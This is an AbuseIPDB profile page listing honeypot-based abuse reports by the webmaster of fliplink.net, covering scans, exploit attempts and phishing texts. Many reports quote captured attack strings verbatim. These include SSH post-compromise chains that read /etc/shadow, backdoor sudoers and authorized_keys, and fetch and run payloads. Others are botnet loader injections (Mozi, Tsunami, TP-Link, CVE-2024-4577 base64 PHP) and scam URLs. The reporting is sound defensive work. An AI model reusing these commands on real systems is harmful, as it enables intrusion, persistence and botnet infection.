Fliplink - AbuseIPDB User Profile

JavaScript is disabled. Some features of this site may not work properly. For a smoother experience, please enable JavaScript in your browser settings.

User Fliplink , the webmaster of fliplink.net, joined AbuseIPDB in July 2021 and has reported 47 IP addresses.

Standing (weight) is good.

ACTIVE USER WEBMASTER SUPPORTER

IP	Date	Comment	Categories
🇺🇸 3.18.106.28	26 May 2026	### Technical Forensics - Target Demographics: Port scanning is not sequential but targeted, sp ... show more ### Technical Forensics - Target Demographics: Port scanning is not sequential but targeted, specifically hitting 2049 (NFS), 1521 (Oracle), 3306 (MySQL), 5432 (Postgres), and notably, interacting with Conpot honeypots mimicking ICS devices (IEC104 and Kamstrup smart meters). - Network Identity: The actor leverages AWS EC2 (`3.18.106.28`) in US-East-2. The network traffic yields a Go-specific HASSH (`084386fa7ae5039bcf6f07298a05a227`) and JA3 (`cba7f34191ef2379c1325641f6c6c4f4`). - Evasion Tactics: The User-Agent is spoofed to appear as MacOS Chrome, but the underlying TLS and SSH fingerprints betray its programmatic nature. ### Threat Landscape This operation bridges IT and OT, suggesting a highly capable actor—potentially an APT or advanced initial access broker (IAB)—seeking foothold access for severe downstream impact. show less	IoT Targeted
🇳🇱 93.123.109.205	13 Mar 2026	## 3. KILL_CHAIN & MITRE 1. Reconnaissance [LOGGED] - Time: 2026-03-09T02:21:41Z (First ... show more ## 3. KILL_CHAIN & MITRE 1. Reconnaissance [LOGGED] - Time: 2026-03-09T02:21:41Z (First Seen) - Evidence: Active scanning against exposed web services, logging 6,725 hits for active scanning. The actor probed root directories, `/api/`, and `/wp-admin/` paths. - MITRE: T1595 - Active Scanning. The actor mapped the attack surface to identify vulnerable applications. 4. Exploitation [LOGGED] - Time: Continuous throughout the window. - Evidence: Execution of arbitrary code via URI parameters. Example logged artifact: `/%24%7B%28%23a%3D%40org.apache.commons.io.IOUtils%40toString%28%40java.lang.Runtime%40getRuntime%28%29.exec%28%22whoami%22%29.getInputStream%28%29%2C%22utf-8%22%29%29...` which decodes to a Java show less	Port Scan Hacking Web App Attack
🇨🇳 61.155.110.210	12 Feb 2026	uname -a;id;cat /etc/shadow /etc/passwd;lscpu;echo 'daemon ALL=(ALL) NOPASSWD: ALL' >> /etc/sudoers; ... show more uname -a;id;cat /etc/shadow /etc/passwd;lscpu;echo 'daemon ALL=(ALL) NOPASSWD: ALL' >> /etc/sudoers;chsh -s /bin/sh daemon;echo Password123 \|passwd daemon --stdin;mkdir ~/.ssh;chattr -ia ~/.ssh/* ~/.ssh;wget http://47.105.158.116/ns1.jpg -O ~/.ssh/authorized_keys;chmod 600 ~/.ssh/authorized_keys;chmod 700 ~/ ~/.ssh;wget http://47.105.158.116/ns3.jpg -O /tmp/x;chmod +x /tmp/x;/tmp/x;mv /tmp/x /tmp/o;/tmp/o;rm -f /tmp/o;mkdir /sbin/.ssh;cp ~/.ssh/authorized_keys /sbin/.ssh;chown daemon.daemon /sbin/.ssh /sbin/.ssh/*;chmod 700 /sbin/.ssh;chmod 600 /sbin/.ssh/authorized_keys;wget http://47.105.158.116/oto -O /etc/oto;chmod 755 /tmp/oto;/tmp/oto;curl http://47.105.158.116/oto -o /tmp/oto;chmod 755 /tmp/oto;/tmp/oto;rm -f /tmp/oto show less	Hacking Exploited Host SSH
🇨🇳 47.105.158.116	12 Feb 2026	uname -a;id;cat /etc/shadow /etc/passwd;lscpu;echo 'daemon ALL=(ALL) NOPASSWD: ALL' >> /etc/sudoers; ... show more uname -a;id;cat /etc/shadow /etc/passwd;lscpu;echo 'daemon ALL=(ALL) NOPASSWD: ALL' >> /etc/sudoers;chsh -s /bin/sh daemon;echo Password123 \|passwd daemon --stdin;mkdir ~/.ssh;chattr -ia ~/.ssh/* ~/.ssh;wget http://47.105.158.116/ns1.jpg -O ~/.ssh/authorized_keys;chmod 600 ~/.ssh/authorized_keys;chmod 700 ~/ ~/.ssh;wget http://47.105.158.116/ns3.jpg -O /tmp/x;chmod +x /tmp/x;/tmp/x;mv /tmp/x /tmp/o;/tmp/o;rm -f /tmp/o;mkdir /sbin/.ssh;cp ~/.ssh/authorized_keys /sbin/.ssh;chown daemon.daemon /sbin/.ssh /sbin/.ssh/*;chmod 700 /sbin/.ssh;chmod 600 /sbin/.ssh/authorized_keys;wget http://47.105.158.116/oto -O /etc/oto;chmod 755 /tmp/oto;/tmp/oto;curl http://47.105.158.116/oto -o /tmp/oto;chmod 755 /tmp/oto;/tmp/oto;rm -f /tmp/oto show less	Hacking Exploited Host SSH
🇯🇵 103.106.228.105	02 Jan 2026	Gateway detected WAN Ping attack from 103.106.228.105 and dropped 445 packets.	DDoS Attack
🇲🇲 103.113.85.194	02 Jan 2026	Gateway detected WAN Ping attack from 103.113.85.194 and dropped 207 packets	DDoS Attack
🇵🇰 139.135.40.75	22 Dec 2025	http://139.135.40.75:39988/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.m	Hacking Bad Web Bot
🇺🇸 70.184.13.47	06 Dec 2025	Campaign Metrics: \| Metric \| Count \| Details \| \| :--- \| :--- \| :--- \| \| Total Events \| 34 \| High-den ... show more Campaign Metrics: \| Metric \| Count \| Details \| \| :--- \| :--- \| :--- \| \| Total Events \| 34 \| High-density burst attacks \| \| Exploits Used \| 3 \| WebLogic, TR-064, Four-Faith \| \| Payload/C2 \| 1 \| 70.184.13.47 (hosting rondo.*.sh) \| \| Target Ports \| 4 \| 7001 (TCP), 7547 (TCP), 8088 (TCP), 8022 (TCP) \|I'm calling this actor "Rondo-Loader" based on the distinct signature in their payload filenames (rondo.xcw.sh, rondo.kqz.sh) and User-Agent ([email protected]). show less	Hacking Exploited Host Web App Attack
🇺🇸 192.159.99.95	06 Dec 2025	Campaign Metrics: \| Metric \| Count \| Details \|\| Total Events \| 34 \| High-density burst attacks \| \| E ... show more Campaign Metrics: \| Metric \| Count \| Details \|\| Total Events \| 34 \| High-density burst attacks \| \| Exploits Used \| 3 \| WebLogic, TR-064, Four-Faith \| \| Payload/C2 \| 1 \| 70.184.13.47 (hosting rondo.*.sh) \| \| Target Ports \| 4 \| 7001 (TCP), 7547 (TCP), 8088 (TCP), 8022 (TCP) \|I'm calling this actor "Rondo-Loader" based on the distinct signature in their payload filenames (rondo.xcw.sh, rondo.kqz.sh) and User-Agent ([email protected]). show less	Hacking Web App Attack
🇷🇺 185.17.30.45	26 Oct 2025	Field Value Honeypot apollo-web-svc-03 Event Time (Local) 202 ... show more Field Value Honeypot apollo-web-svc-03 Event Time (Local) 2025-10-25 21:05:15 (America/Chicago) Attacker IP 185.17.30.45 Geolocation Moscow, Russia ASN AS48666 (JSC 'Telecom-Project') Vector CVE-2024-3400 Payload URL http://185.17.30.45/bins/lin.x64 C2 Callback URL http://evil-c2-vortex.ru/gate.php Malware Hash a1b2c3d4e5f6...f6a1b2 COMMANDS EXECUTED (POST-COMPROMISE) whoami uname -a wget -O /tmp/payload http://185.17.30.45/bins/lin.x64 chmod +x /tmp/payload /tmp/payload & show less	Hacking Web App Attack
🇩🇪 81.88.18.108	23 Oct 2025	GET /shell?cd /tmp; echo >SHADOWV2 \|\| cd /var; echo >SHADOWV2; cp /bin/busybox shadow; >shadow; chmo ... show more GET /shell?cd /tmp; echo >SHADOWV2 \|\| cd /var; echo >SHADOWV2; cp /bin/busybox shadow; >shadow; chmod 777 shadow; wget -q -O shadow http:/\/81.88.18.108:80/shadow/bins/shadow.arm5 \|\| busybox wget -q -O shadow http:/\/81.88.18.108:80/shadow/bins/shadow.arm5 \|\| curl -fsSL -o shadow http:/\/81.88.18.108:80/shadow/bins/shadow.arm5 \|\| wget -q -O shadow http://81.88.18.108:80/shadow/bins/shadow.arm5 \|\| busybox wget -q -O shadow http://81.88.18.108:80/shadow/bins/shadow.arm5 \|\| curl -fsSL -o shadow http://81.88.18.108:80/shadow/bins/shadow.arm5 \|\| nohup tftp -g 81.88.18.108 -r shadow.arm5 -l shadow; chmod 777 shadow; ./shadow; rm -rf shadow >/dev/null 2>&1 HTTP/1.1 show less	Hacking Web App Attack
🇳🇱 64.39.106.17	22 Oct 2025	GET /console/framework/skins/wlsconsole/css/%252E%252E%252Fconsole.portal?...ClassPathXmlApplication ... show more GET /console/framework/skins/wlsconsole/css/%252E%252E%252Fconsole.portal?...ClassPathXmlApplicationContext("http://64.39.106.17:35467") {"timestamp":"2025-10-10T19:19:47.125942+0000","flow_id":571499503316323,"in_iface":"bond0","event_type":"alert","vlan":[20],"src_ip":"64.39.106.17","src_port":58082,"dest_ip":"172.16.##.##","dest_port":8080,"proto":"TCP","pkt_src":"wire/pcap","community_id":"1:Pa8m0K9H4tvxRvacTSaHn0H135s=","tx_id":0,"alert":{"action":"allowed","gid":1,"signature_id":2031145,"rev":1,"signature":"ET WEB_SPECIFIC_APPS Possible Oracle WebLogic RCE Fuzzing Inbound M2","category":"Attempted Administrator Privilege Gain","severity":1,"metadata":{"confidence":["Medium"],"created_at":["2020_10_30"],"deployment":["Internal","Perimeter"],"signature_severity":["Informational"],"ta show less	Hacking Exploited Host Web App Attack
🇻🇳 14.237.226.86	21 Oct 2025	Executive Summary — 10,000 events (America/Chicago) Attempts: 10,000 \| Unique IPs: 83 \| Peak loca ... show more Executive Summary — 10,000 events (America/Chicago) Attempts: 10,000 \| Unique IPs: 83 \| Peak local hour: 2025-10-20 22:00 (6,733 hits) Top Service/Port: SMB :445 (53.3%), then VNC/RFB :5900 (26.5%). Dominant Source: 14.237.226.86 (VNPT Corp) drove 53.4% of all attempts, almost exclusively at SMB :445. show less	Port Scan Brute-Force Exploited Host
🇮🇳 68.183.87.74	17 Sep 2025	At 17:31 UTC on September 17, 2025, Security Onion detected a high-severity exploitation attempt tar ... show more At 17:31 UTC on September 17, 2025, Security Onion detected a high-severity exploitation attempt targeting the T-Pot honeypot at 172.16.XX.XX The attack originated from IP 68.183.87.74 and leveraged a known PHP vulnerability (CVE-2024-4577), exploiting auto_prepend_file=php://input to execute base64-encoded shell commands. The attacker attempted to download and execute a shell script (redtail.sh) from a remote host (178.16.55.224). The script appears designed to self-replicate using the apache.selfrep iden <?php shell_exec(base64_decode( "Y2QgL3RtcCB8fCBjZCAvdmFyL3RtcDsgY3VybCBodHRwOi8vMTc4LjE2LjU1LjIyNC9zaCAtbyByZWR0YWlsLnNoIHx8IHdnZXQgaHR0cDovLzE3OC4xNi41NS4yMjQvc2ggLU8gcmVkdGFpbC5zaDsgY2htb2QgK3ggcmVkdGFpbC5zaDsgLi9yZWR0YWlsLnNoIGN2ZV8yMDI0XzQ1Nzcuc2VsZnJlcDsgcm0gLXJmIHJlZHRhaWwuc2g=" )); echo(md5("Hello CVE-2024-4577")); ?> show less	Hacking Web App Attack
🇭🇰 45.125.12.175	29 Aug 2025	POST /tmUnblock.cgi HTTP/1.1 ... ttcp_ip=-h `cd /tmp; rm -rf Tsunami.mpsl; wget http://45.125.12.1 ... show more POST /tmUnblock.cgi HTTP/1.1 ... ttcp_ip=-h `cd /tmp; rm -rf Tsunami.mpsl; wget http://45.125.12.175/vb/Tsunami.mpsl; chmod 777 Tsunami.mpsl; ./Tsunami.mpsl linksys` show less	Web App Attack
🇬🇧 176.27.205.47	29 Aug 2025	POST /tmUnblock.cgi HTTP/1.1 ... ttcp_ip=-h `cd /tmp; rm -rf Tsunami.mpsl; wget http://45.125.12.1 ... show more POST /tmUnblock.cgi HTTP/1.1 ... ttcp_ip=-h `cd /tmp; rm -rf Tsunami.mpsl; wget http://45.125.12.175/vb/Tsunami.mpsl; chmod 777 Tsunami.mpsl; ./Tsunami.mpsl linksys` show less	Web App Attack
🇳🇱 34.91.168.191	02 Jun 2025	Timestamp (UTC): 2025-06-02T21:24:27.241Z Source Port (on reported IP): 80 (HTTP) Destination IP ( ... show more Timestamp (UTC): 2025-06-02T21:24:27.241Z Source Port (on reported IP): 80 (HTTP) Destination IP (Our network): 172.16.20.10 Destination Port (Our network): 34812 Description: Observed HTTP GET request from our internal host 172.16.20.10 to 34.91.168.191. The IP address 34.91.168.191 responded by sending a 'text/plain' file of 368 bytes to our host. The investigation into the file's content and purpose is ongoing. GET /lawl.sh HTTP/1.1 Host: 34.91.168.191 User-Agent: curl/7.73.0 Accept-Encoding: gzip, deflate Accept: / Connection: keep-alive HTTP/1.1 200 OK Date: Mon, 02 Jun 2025 21:24:27 GMT Server: Apache/2.4.62 (CentOS Stream) Last-Modified: Mon, 02 Jun 2 show less	Hacking Bad Web Bot
🇦🇷 200.123.53.56	19 May 2025	Multiple Suricata alerts (SID 2000418 – ELF download) from IP 200.123.53.56 over TCP port 5555 targe ... show more Multiple Suricata alerts (SID 2000418 – ELF download) from IP 200.123.53.56 over TCP port 5555 targeting honeypot 172.16.20.10. Payload includes ELF binaries and an Android APK ("ufo.apk") indicative of cross-platform malware. Remote shell commands observed: - pm install /data/local/tmp/ufo.apk - am start -n com.ufo.miner/com.example.test.MainActivity - ps \| grep trinity - rm -rf /data/local/tmp/* Indicates ADB-like activity with persistence attempts. Repeated downloads and command sessions show multi-stage infection behavior. Confidence: High. Severity: High. Likely IoT/Android botnet loader or cryptominer setup. Observed across 2 distinct sessions and 4 alerts in total. show less	Hacking IoT Targeted
🇮🇶 185.140.194.169	17 May 2025	At 2025-05-16 22:58 UTC, a remote IP address (185.140.194.169) initiated a Telnet session with the T ... show more At 2025-05-16 22:58 UTC, a remote IP address (185.140.194.169) initiated a Telnet session with the T-Pot honeypot (DMZ node 172.16.20.10). Despite multiple failed login attempts, the attacker succeeded in establishing a shell using the username mother@ubuntu. The session involved system enumeration, command execution, payload staging attempts, and fallback to failed download commands. This behavior mimics post-exploitation C2 and script-based lateral movement techniques. The attacker issued unknown commands via BusyBox and used /dev/shm as a staging area, suggesting attempted stealth persistence. show less	Port Scan Hacking Brute-Force Exploited Host
🇩🇪 176.65.148.239	30 Apr 2025	GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id>`cd /tmp; rm -rf sh; wget ... show more GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id>`cd /tmp; rm -rf sh; wget http://176.65.148.234/sh; chmod 777 sh; ./sh tplink; rm -rf sh`) HTTP/1.1 show less	Port Scan Hacking Bad Web Bot Exploited Host Web App Attack
🇪🇬 41.233.204.231	17 Apr 2025	Your Security Onion / Suricata sensor has caught a live exploit attempt for the MVPower DVR “/shell” ... show more Your Security Onion / Suricata sensor has caught a live exploit attempt for the MVPower DVR “/shell” remote‑command bug—an oldie‑but‑still‑golden favorite of the Mirai/Gafgyt IoT botnet family. The attacker (41.233.204.231:60972, Egypt‑allocated subnet) tried to push an ARM7 binary called xd.arm7 that would have turned any vulnerable DVR, IP‑cam or embedded Linux box at 172.16.XX.XX:5501 into another Mirai soldier. Because the flow was allowed, the packet reached your honeynet / DMZ host, but no follow‑up traffic has (yet) been seen. show less	Hacking Web App Attack
🇮🇩 110.138.207.60	03 Apr 2025	110.138.207.60, TCP port 445, SMB Session Setup, Tree Connect, Trans2 using Metasploit. Indicator ... show more 110.138.207.60, TCP port 445, SMB Session Setup, Tree Connect, Trans2 using Metasploit. Indicator Value Threat Type Remote Code Execution (via SMB) Risk Score 9.5/10 Affected System Honeypot on ###.###.###.### Exploit Attempted EternalBlue (MS17-010) Known Exploit Kit Metasploit Malware Family ETERNALBLUE show less	Exploited Host Web App Attack
🇺🇸 104.21.71.36	17 Mar 2025	City Department of Transportation Final warning: $6.99 owed. Must pay by 03/17 to close case or face ... show more City Department of Transportation Final warning: $6.99 owed. Must pay by 03/17 to close case or face court summons. Settle now: __https://iolkyrlinn.vip/us Thank you for your cooperation. show less	Phishing Email Spam
🇺🇸 172.67.169.118	17 Mar 2025	City Department of Transportation Final warning: $6.99 owed. Must pay by 03/17 to close case or face ... show more City Department of Transportation Final warning: $6.99 owed. Must pay by 03/17 to close case or face court summons. Settle now: __https://iolkyrlinn.vip/us Thank you for your cooperation. show less	Phishing Email Spam
🇺🇸 49.51.202.123	30 Dec 2024	From a fake USPS shipping sms	Fraud Orders Phishing Email Spam